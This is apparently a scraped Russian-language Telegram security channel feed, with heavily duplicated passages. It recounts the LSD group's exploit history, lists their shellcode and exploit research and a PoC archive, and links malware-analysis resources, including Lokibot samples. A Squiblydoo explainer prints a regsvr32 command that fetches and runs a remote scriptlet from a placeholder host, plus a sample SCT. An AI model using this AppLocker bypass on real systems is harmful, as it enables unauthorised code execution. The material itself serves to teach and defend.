(1/2)
В те времена эксперты ИБ считали, что даже честно проведенные соревнования на взлом не особо сильно влияют на безопасность систем в реальных условиях.
В марте 2003 года, LSD вновь заявили о себе, опубликовав эксплоит для уязвимости в SMTP сервере Sendmail (remote buffer overflow). Тогда же, вице-президент Internet Security Systems (компания, обнаружившая уязвимость), сказал - "Являясь вендором решений информационной безопасности, мы считаем плохим делом постить публично эксплоиты, так как это может помочь плохим ребятам ломать системы". В 2021 году также считает и Github, ужесточая политику хостинга эксплоитов и малвари. Если в наше время эксплоиты/PoC постят больше для проверки своих систем на уязвимость и как некое "предупреждение" пропатчится, то в то время мотивацией LSD была сообщить сообществу, что на самом деле Internet Security Systems переоценила угрозу безопасности от уязвимости в Sendmail и бага была некритичная. Иронично то, что LSD подвергались критике и за противоположные действия! 15 октября 2003 года, LSD обнаружили критическую уязвимость в Windows RPC. Уязвимость затрагивала огромное на то время количество систем и ее можно было проэксплуатировать удаленно в Microsoft Windows NT 4.0, Windows 2000 и Windows XP. Но в этот раз, LSD не опубликовали эксплоит и как минимум одна секьюрити компания выступила с критикой - "Как вы докажете баг без кода?" (цитата). Как сказал бы Эскобар - шо то хуйня, шо это хуйня. Кстати эта уязвимость привела к появлению червя Blaster и в 2003 году называлась самой большой дырой в истории Windows (BlueKeep появился в 2019). Уязвимость не затрагивала Windows Server 2003, так как он был скомпилирован с ключом /GS (что это такое, можете прочитать в моей статье).
Проект LSD находил еще несколько критических уязвимостей в разных продуктах и оставил в наследие несколько исследований. Сайт проекта уже давно недоступен, но их исследования/статьи/код вы можете скачать у меня в канале.
В те времена эксперты ИБ считали, что даже честно проведенные соревнования на взлом не особо сильно влияют на безопасность систем в реальных условиях.
В марте 2003 года, LSD вновь заявили о себе, опубликовав эксплоит для уязвимости в SMTP сервере Sendmail (remote buffer overflow). Тогда же, вице-президент Internet Security Systems (компания, обнаружившая уязвимость), сказал - "Являясь вендором решений информационной безопасности, мы считаем плохим делом постить публично эксплоиты, так как это может помочь плохим ребятам ломать системы". В 2021 году также считает и Github, ужесточая политику хостинга эксплоитов и малвари. Если в наше время эксплоиты/PoC постят больше для проверки своих систем на уязвимость и как некое "предупреждение" пропатчится, то в то время мотивацией LSD была сообщить сообществу, что на самом деле Internet Security Systems переоценила угрозу безопасности от уязвимости в Sendmail и бага была некритичная. Иронично то, что LSD подвергались критике и за противоположные действия! 15 октября 2003 года, LSD обнаружили критическую уязвимость в Windows RPC. Уязвимость затрагивала огромное на то время количество систем и ее можно было проэксплуатировать удаленно в Microsoft Windows NT 4.0, Windows 2000 и Windows XP. Но в этот раз, LSD не опубликовали эксплоит и как минимум одна секьюрити компания выступила с критикой - "Как вы докажете баг без кода?" (цитата). Как сказал бы Эскобар - шо то хуйня, шо это хуйня. Кстати эта уязвимость привела к появлению червя Blaster и в 2003 году называлась самой большой дырой в истории Windows (BlueKeep появился в 2019). Уязвимость не затрагивала Windows Server 2003, так как он был скомпилирован с ключом /GS (что это такое, можете прочитать в моей статье).
Проект LSD находил еще несколько критических уязвимостей в разных продуктах и оставил в наследие несколько исследований. Сайт проекта уже давно недоступен, но их исследования/статьи/код вы можете скачать у меня в канале.
(2/2)
UNIX Assembly components (shellcodes)
Исследование про написание шеллкодов под разные операционные системы (Solaris, Linux, BSD, SCO, BeOS) и процессорные архитектуры (IRIX/MIPS, HP-UX/PA-RISC, AIX/PowerPC/POWER, Ultrix/ALPHA,Solaris/SPARC)
Презентация
Статья
Исходники
Kernel Level Vulnerabilities (Behind the Scenes of 5th Argus Hacking Challenge)
Материал про то самое соревнование от Argus
Презентация
Исходники
Статья
JAVA and JVM Security Vulnerabilities and their Exploitation Techniques
Огромное исследование безопасности Java и JVM. Включает в себя описание аспектов безопасности фич языка, песочницы апплетов, верификатора байткода, менеджера безопасности и методов эксплуатации.
Презентация
Исходники
Статья
WIN32 Assembly components (shellcodes)
Про техники написания шеллкодов под Windows. Описываются скрытные и настраиваемые шеллкоды, позволяющие получить полный удаленный контроль над компьютером.
Презентация
Статья
Исходники
Microsoft Windows RPC Security Vulnerabilities
Исследование двух критических уязвимостей, найденных LSD в 2003 году в Windows RPC.
Презентация
Исходники
Security Myths
Презентация про наболевшее (Argus), про JVM и про мифы мира ИБ того времени.
Vulnerabilities / Exploits Archive
Коллекция старых PoC тех времен для уязвимостей в Irix, Solaris, AIX, HP-UX, SCO, BSD, Linux ,Windows, JVM
UNIX Assembly components (shellcodes)
Исследование про написание шеллкодов под разные операционные системы (Solaris, Linux, BSD, SCO, BeOS) и процессорные архитектуры (IRIX/MIPS, HP-UX/PA-RISC, AIX/PowerPC/POWER, Ultrix/ALPHA,Solaris/SPARC)
Презентация
Статья
Исходники
Kernel Level Vulnerabilities (Behind the Scenes of 5th Argus Hacking Challenge)
Материал про то самое соревнование от Argus
Презентация
Исходники
Статья
JAVA and JVM Security Vulnerabilities and their Exploitation Techniques
Огромное исследование безопасности Java и JVM. Включает в себя описание аспектов безопасности фич языка, песочницы апплетов, верификатора байткода, менеджера безопасности и методов эксплуатации.
Презентация
Исходники
Статья
WIN32 Assembly components (shellcodes)
Про техники написания шеллкодов под Windows. Описываются скрытные и настраиваемые шеллкоды, позволяющие получить полный удаленный контроль над компьютером.
Презентация
Статья
Исходники
Microsoft Windows RPC Security Vulnerabilities
Исследование двух критических уязвимостей, найденных LSD в 2003 году в Windows RPC.
Презентация
Исходники
Security Myths
Презентация про наболевшее (Argus), про JVM и про мифы мира ИБ того времени.
Vulnerabilities / Exploits Archive
Коллекция старых PoC тех времен для уязвимостей в Irix, Solaris, AIX, HP-UX, SCO, BSD, Linux ,Windows, JVM
Скрипт для Ghidra для анализа xrefs в objective-c
https://security.humanativaspa.it/fox-fix-objectivec-xrefs-in-ghidra/
https://security.humanativaspa.it/fox-fix-objectivec-xrefs-in-ghidra/
hn security
FOX - Fix Objective-C XREFs in Ghidra - hn security
Hi! This is my first article […]
Announcing Rust for Windows v0.9
https://blogs.windows.com/windowsdeveloper/2021/05/06/announcing-rust-for-windows-v0-9/
https://blogs.windows.com/windowsdeveloper/2021/05/06/announcing-rust-for-windows-v0-9/
Windows Developer Blog
Announcing Rust for Windows v0.9
Rust for Windows v0.9 has recently been released and includes full consumption support, along with several other updates! With completed consumption support, you can now call any Windows APIs (past, present, and futur
ALEXANDREBORGES_DEFCON_2019.pdf
3.1 MB
.NET MALWARE THREAT:
INTERNALS AND
REVERSING
INTERNALS AND
REVERSING
Forwarded from Cybred
Нежелание тратить львиную часть зарплаты на кассеты для посудомоечной машины привели к написанию этого невероятно годного ресерча.
https://telegra.ph/Vzlom-DRM-Umnoj-posudomoechnoj-mashiny-05-04
https://telegra.ph/Vzlom-DRM-Umnoj-posudomoechnoj-mashiny-05-04
Telegraph
Взлом DRM Умной посудомоечной машины
Еще в январе 2021 года я увидел обзор от Techmoan на посудомоечную машину Bob компании Daan Tech. Боб - это элегантная и компактная посудомоечная машина, способная уместиться на столешнице, со встроенным резервуаром для воды, который можно наполнять вручную…
Обзор кастомных протоколов общения с c2 популярных rat
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols
Zscaler
Analysis of top non-HTTP/S threats | Zscaler Blog
In this article, Zscaler security research team dissect the custom protocols used in some of the most prevalent RATs seen in recent campaigns. Read more.
Lokibot - популярный стилер, одной из характерных черт которого является api hashing
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Forwarded from vx-underground
Список инструментов для malware analysis macos малвари
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
Order of Six Angles
Squiblydoo AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe…
Пример sct скрипта
<?XML version="1.0"?>
<scriptlet>
<registration
progid="TESTING"
classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
<script language="JScript">
<![CDATA[
var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>